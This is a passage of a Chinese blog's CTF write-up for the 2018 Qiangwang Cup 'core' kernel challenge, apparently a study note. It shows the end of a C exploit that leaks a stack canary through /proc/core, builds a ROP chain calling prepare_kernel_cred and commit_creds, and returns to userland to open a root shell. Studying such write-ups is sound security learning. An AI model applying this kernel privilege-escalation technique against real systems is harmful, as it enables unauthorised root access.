class="comment">//只拷贝前16字节</span></span><br><span class="line">	    <span class="built_in">sscanf</span>(hex,<span class="string">"%llx"</span>,&amp;commit_creds);</span><br><span class="line">	    vmlinux_base = commit_creds<span class="number">-0x9c8e0</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(<span class="built_in">strstr</span>(tmp,<span class="string">"prepare_kernel_cred"</span>) &amp;&amp; !prepare_kernel_cred)</span><br><span class="line">	&#123;</span><br><span class="line">	    <span class="keyword">char</span> hex[<span class="number">20</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	    <span class="built_in">strncpy</span>(hex,tmp,<span class="number">16</span>);</span><br><span class="line">	    <span class="built_in">sscanf</span>(hex,<span class="string">"%llx"</span>,&amp;prepare_kernel_cred);</span><br><span class="line">	    vmlinux_base = prepare_kernel_cred - <span class="number">0x9cce0</span>;</span><br><span class="line">	&#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(! (prepare_kernel_cred &amp; commit_creds))</span><br><span class="line">    &#123;</span><br><span class="line">	<span class="built_in">puts</span>(<span class="string">"error !"</span>);</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span>  <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">//保存状态</span></span><br><span class="line">    save_status();</span><br><span class="line"></span><br><span class="line">    <span class="comment">//打开驱动文件</span></span><br><span class="line">    <span class="keyword">int</span> fd = open(<span class="string">"/proc/core"</span>,<span class="number">2</span>);</span><br><span class="line">    <span class="keyword">if</span>(fd &lt; <span class="number">0</span>)</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//获取提权函数地址，和加载后的vmlinux基地址</span></span><br><span class="line">    findSyms();</span><br><span class="line"></span><br><span class="line">    <span class="comment">//计算偏移</span></span><br><span class="line">    <span class="keyword">ssize_t</span> offset = vmlinux_base - raw_vmlinux_base;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//设置off值，ida可以看到canary保存在距离当前栈偏移0x40的位置</span></span><br><span class="line">    setoff(fd,<span class="number">0x40</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//core_read函数会把栈上的数据读到用户数据中</span></span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">0x40</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    core_read(fd,buf);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%s\n"</span>,buf);</span><br><span class="line">    <span class="keyword">size_t</span>  canary = ((<span class="keyword">size_t</span> * )buf)[<span class="number">0</span>];<span class="comment">//取数组第一个元素就是canary的值</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"[+]canary: %p\n"</span>,canary);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="comment">//构造rop chain</span></span><br><span class="line">    <span class="keyword">size_t</span> rop[<span class="number">0x1000</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">int</span> i = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        rop[i++] = canary; <span class="comment">//用canary填充</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//rop链 执行提权函数</span></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81000b2f</span> + offset; <span class="comment">// pop rdi; ret</span></span><br><span class="line">    rop[i++] = <span class="number">0</span>;</span><br><span class="line">    rop[i++] = prepare_kernel_cred;         <span class="comment">// prepare_kernel_cred(0)</span></span><br><span class="line"></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff810a0f49</span> + offset; <span class="comment">// pop rdx; ret</span></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81021e53</span> + offset; <span class="comment">// pop rcx; ret</span></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff8101aa6a</span> + offset; <span class="comment">// mov rdi, rax; call rdx; </span></span><br><span class="line">    rop[i++] = commit_creds;</span><br><span class="line"></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81a012da</span> + offset; <span class="comment">// swapgs; popfq; ret</span></span><br><span class="line">    rop[i++] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81050ac2</span> + offset; <span class="comment">// iretq; ret; </span></span><br><span class="line"></span><br><span class="line">    rop[i++] = (<span class="keyword">size_t</span>)getshell;         <span class="comment">// rip </span></span><br><span class="line">    <span class="comment">//恢复用户空间</span></span><br><span class="line">    rop[i++] = user_cs;</span><br><span class="line">    rop[i++] = user_rflags;</span><br><span class="line">    rop[i++] = user_sp;</span><br><span class="line">    rop[i++] = user_ss;</span><br><span class="line">    <span class="comment">//将rop chain写入bss段</span></span><br><span class="line">    write(fd, rop, <span class="number">0x800</span>);</span><br><span class="line">    将bss段中的rop chain 拷贝到内核栈</span><br><span class="line">    core_copy_func(fd, <span class="number">0xffffffffffff0000</span> | (<span class="number">0x100</span>));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0xFF-Reference"><a href="#0xFF-Reference" class="headerlink" title="0xFF Reference"></a>0xFF Reference</h2><p><a href="https://www.anquanke.com/post/id/172216" target="_blank" rel="noopener">https://www.anquanke.com/post/id/172216</a><br><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_rop-zh/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_rop-zh/</a><br><a href="https://www.anquanke.com/post/id/103920" target="_blank" rel="noopener">https://www.anquanke.com/post/id/103920</a><br><a href="http://p4nda.top/2018/07/13/ciscn2018-core/" target="_blank" rel="noopener">http://p4nda.top/2018/07/13/ciscn2018-core/</a></p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    v1cky01dxp
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="https://v1ckydxp.github.io/archives/2019/08/27/2019-08-27-2018-强网杯-core/" title="2018 强网杯 CORE writeup 学习笔记">https://v1ckydxp.github.io/archives/2019/08/27/2019-08-27-2018-强网杯-core/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://v1ckydxp.github.io" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/linux-kernel-pwn/" rel="tag"># linux kernel pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/24/2019-07-24-gdb 报错 -- “g pack too long”/" rel="next" title="gdb调试报错 -- g pack too long">
                <i class="fa fa-chevron-left"></i> gdb调试报错 -- g pack too long
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/28/2019-08-28-cve-2013-1763 漏洞复现/" rel="prev" title="Linux Kernel CVE-2013-1763 本地提权漏洞分析复现">
                Linux Kernel CVE-2013-1763 本地提权漏洞分析复现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">v1cky01dxp</p>
	      <img class="site-author-image" itemprop="image" src="/images/head.jpeg" alt="v1cky01dxp">
	      <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">35</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/v1ckydxp" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:sunshinedxp@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/helica/" title="helica" target="_blank">helica</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ama2in9.top/" title="ama2in9" target="_blank">ama2in9</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-题目基本信息"><span class="nav-number">2.</span> <span class="nav-text">0x01 题目基本信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-漏洞分析"><span class="nav-number">3.</span> <span class="nav-text">0x02 漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#查看init-module函数和fop结构体"><span class="nav-number">3.1.</span> <span class="nav-text">查看init_module函数和fop结构体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#core-ioctl"><span class="nav-number">3.2.</span> <span class="nav-text">core_ioctl</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#core-read"><span class="nav-number">3.3.</span> <span class="nav-text">core_read</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#core-copy-func"><span class="nav-number">3.4.</span> <span class="nav-text">core_copy_func</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#core-write"><span class="nav-number">3.5.</span> <span class="nav-text">core_write</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-漏洞利用"><span class="nav-number">4.</span> <span class="nav-text">0x03 漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#获取commit-creds、prapare-kernel-cred函数地址"><span class="nav-number">4.1.</span> <span class="nav-text">获取commit_creds、prapare_kernel_cred函数地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取gadget"><span class="nav-number">4.2.</span> <span class="nav-text">获取gadget</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#保存用户环境"><span class="nav-number">4.3.</span> <span class="nav-text">保存用户环境</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ROP链构造"><span class="nav-number">4.4.</span> <span class="nav-text">ROP链构造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">4.5.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0xFF-Reference"><span class="nav-number">5.</span> <span class="nav-text">0xFF Reference</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">v1cky01dxp</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">41.6k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
